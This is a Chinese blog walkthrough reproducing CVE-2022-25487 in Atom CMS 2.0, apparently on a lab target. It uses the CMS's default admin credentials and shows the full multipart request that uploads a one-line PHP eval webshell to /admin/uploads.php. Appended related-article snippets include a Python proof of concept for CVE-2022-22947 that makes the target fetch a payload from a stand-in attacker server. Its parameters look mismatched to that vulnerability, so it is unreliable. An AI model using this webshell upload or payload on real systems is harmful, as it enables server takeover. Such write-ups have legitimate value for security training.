CVE-2022-25487 漏洞复现

已于 2024-02-17 20:28:08 修改
阅读量1.1k 收藏 2
点赞数 8
CC 4.0 BY-SA版权
分类专栏: CVE复现 文章标签: 漏洞复现 CVE Web安全 网络安全 PHP CVE-2022-25487
于 2024-02-12 22:33:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jayjay___/article/details/136104023

漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。

其实这就是一个文件上传漏洞罢了。。。。

打开之后,/home路由是个空白

image-20240210064833778

信息搜集:该cms有默认邮箱/密码 alan@alan.com/password,到/admin路由下尝试登录。

image-20240210065002672

Users下有个上传文件功能,可能是上传头像用的。

image-20240210065136974

image-20240210065150788

抓包中无文件上传的内容????(奇奇怪怪)

看了一下,漏洞路由在/admin/uploads.php,直接在界面中点击到不了这个路由。。。。

直接修改刚刚的包吧

image-20240210070630756

直接传php文件,这cms写的真shit

Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041





-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"


-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg


<?php @eval($_POST['cmd']);?>
-----------------------------30623082103363803402542706041--

image-20240210070907146

访问木马存储路由/uploads/1707520195231.phpgetshell

image-20240210071158225

VMware Tools本地提权漏洞CVE-2022-31676分析与复现(1)
顶峰
02-15 562
VMware Tools没有正确的检查客户端请求的授权,导致包含一个本地权限提升漏洞,可以使虚拟机中的计算机账号由非管理员权限提升到管理员权限。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
ThinkPHP 信息泄露 (CVE-2022-25481)
voctor2436的博客
05-11 9478
发现 ThinkPHP Framework v5.0.24 配置为没有 PATHINFO 参数。这允许攻击者从 index.php 访问所有系统环境参数。顶想信息科技ThinkPHP是中国顶想信息科技公司的一套基于PHP的、开源的、轻量级Web应用程序开发框架。升级到ThinkPHP 5.0.25或更高版本。
春秋云境CVE-2022-25487
2303_76653367的博客
05-15 455
Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。
Atom CMS 远程代码执行漏洞(CVE-2022-25487)
qq_69432323的博客
07-23 477
Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。
Spring Cloud Gateway(CVE-2022-22947)漏洞复现
swordheart的博客
05-12 2373
1.漏洞介绍 当Spring Cloud Gateway启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。 2.漏洞复现 2.1更新vulhub,切换到vulhub的目录git pull 拉取vulhub进行更新 2.2 进入cve-2022-22947,启动容器 2.3 访问漏洞环境 2.4 burp抓包,添加包含恶意的路由 POST .
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 3343
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
春秋云境 CVE-2022-4230 夺旗
05-02
**CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时没有进行充分的数据转义,从而导致SQL注入攻击成为可能。具体来说: ...
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
【vulhub系列】CVE-2022-22947 Spring Cloud Gateway远程代码执行漏洞复现
Wiofgb的博客
08-16 1446
CVE-2022-22947 Spring Cloud Gateway远程代码执行漏洞复现
CVE-2022-32991漏洞复现(春秋云镜手工注入sql+自己配置内网环境)
c0529的博客
12-15 709
Web Based Quiz System v1.0版本存在SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。得到了flag,就可以交了,这些过程证明了该漏洞可以利用于查询该数据库的敏感信息,可以利用这些方式得到数据库中用户的账户密码等等。从onder by 1一直尝试到order by 6,只有6报错,发现该表有五个字段。查询数据库中的所有表的名字,利用数据库自带的表,得到了所有的表。用hackbar插件输入(火狐浏览器)看到了flag表,查询表内的列。
复现CVE-2022-10270(向日葵远程代码执行漏洞
BGiscool的博客
02-22 7148
CVE-2022-10270-向日葵远程代码执行漏洞复现
【春秋云境】CVE-2022-25488靶场WP和CVE-2022-25401靶场WP
果粒程
11-30 1464
【春秋云境】CVE-2022-25488靶场WP和CVE-2022-25401靶场WP
CVE-2022-25488
qq_42036164的博客
01-09 413
3.根据题目提示尝试url+?[在这里插入图片描述](https://img-blog.csdnimg.cn/5135d626f0af41c4bfb36a8d4f5a968c.png)4.尝试后发现存在注入点,sql注入读取文件`view-source:http://eci-2ze3oflmagdd2oq9a1p0.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?
春秋云境:CVE-2022-25488
一只爱吃橙子的羊
11-30 1653
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
ThinkPHP 小于5.0.24 远程代码执行高危漏洞 修复方案
danson_yang的专栏
01-18 2694
漏洞描述 由于ThinkPHP5.0框架对Request类的method处理存在缺陷,导致黑客构造特定的请求,可直接GetWebShell。 漏洞评级 严重 影响版本 ThinkPHP 5.0系列 &lt; 5.0.24 安全版本 ThinkPHP 5.0系列 5.0.24 ThinkPHP 5.1系列 5.1.31 安全建议 升级ThinkPHP安全版本 修复方法1.打开 \think...
CVE-2022-22947 漏洞复现
最新发布
04-01
### 关于 CVE-2022-22947 漏洞复现 CVE-2022-22947 是一个存在于 Spring Cloud Gateway 中的远程代码执行漏洞,攻击者可以通过构造恶意请求触发该漏洞并实现远程命令执行。以下是针对此漏洞复现过程及相关技术细节。 #### 1. 漏洞概述 Spring Cloud Gateway 的路由功能存在缺陷,在处理某些特定参数时未能正确验证输入数据的安全性,从而允许攻击者通过精心设计的 HTTP 请求注入恶意代码[^4]。 #### 2. 环境准备 为了成功复现 CVE-2022-22947 漏洞,需搭建如下测试环境: - **操作系统**: Linux 或 Windows (推荐 Ubuntu) - **Java 版本**: JDK 8 及以上版本 - **依赖组件**: - Spring Boot >= 2.6.x, < 2.6.7 - Spring Cloud Gateway >= 3.1.x, < 3.1.2 安装完成后启动服务端程序,并确认其正常运行状态。 #### 3. 利用工具与脚本 可采用以下方式完成漏洞利用操作: ##### 方法一:手动构建 POC 下面展示了一个简单的 Python 脚本来模拟攻击行为: ```python import requests url = "http://target-ip:port/gateway" payload = { 'class.module.classLoader.resources.context': '', 'class.module.classLoader.URLs': '[new java.net.URL("http://attacker-server/payload")]', } response = requests.post(url, data=payload) if response.status_code == 200: print("[+] Payload sent successfully!") else: print(f"[-] Failed to send payload! Status code {response.status_code}") ``` 上述代码片段尝试向目标服务器发送包含恶意 URL 地址的数据包以加载外部资源文件。 ##### 方法二:自动化扫描器 部分开源安全检测平台已经集成了对该类问题的支持模块,例如 Metasploit Framework 和 Nmap Script Engine 。用户只需按照官方文档指引配置相应选项即可快速定位受影响资产实例。 #### 4. 结果验证 当成功触发漏洞后,通常会在日志记录或者实际业务逻辑层面观察到异常现象;与此同时也可以借助网络抓包手段进一步核实交互详情。 #### 5. 安全加固建议 为了避免遭受此类威胁影响,请及时采取措施升级至最新稳定版软件发行号,并遵循最佳实践指导原则加强整体防护能力水平: - 更新至不受影响的新版本; - 使用 Web 应用防火墙(WAF)作为额外屏障层过滤潜在危险流量模式; - 对所有传入参数实施严格的白名单校验机制防止非法字符混入其中。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jay 17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值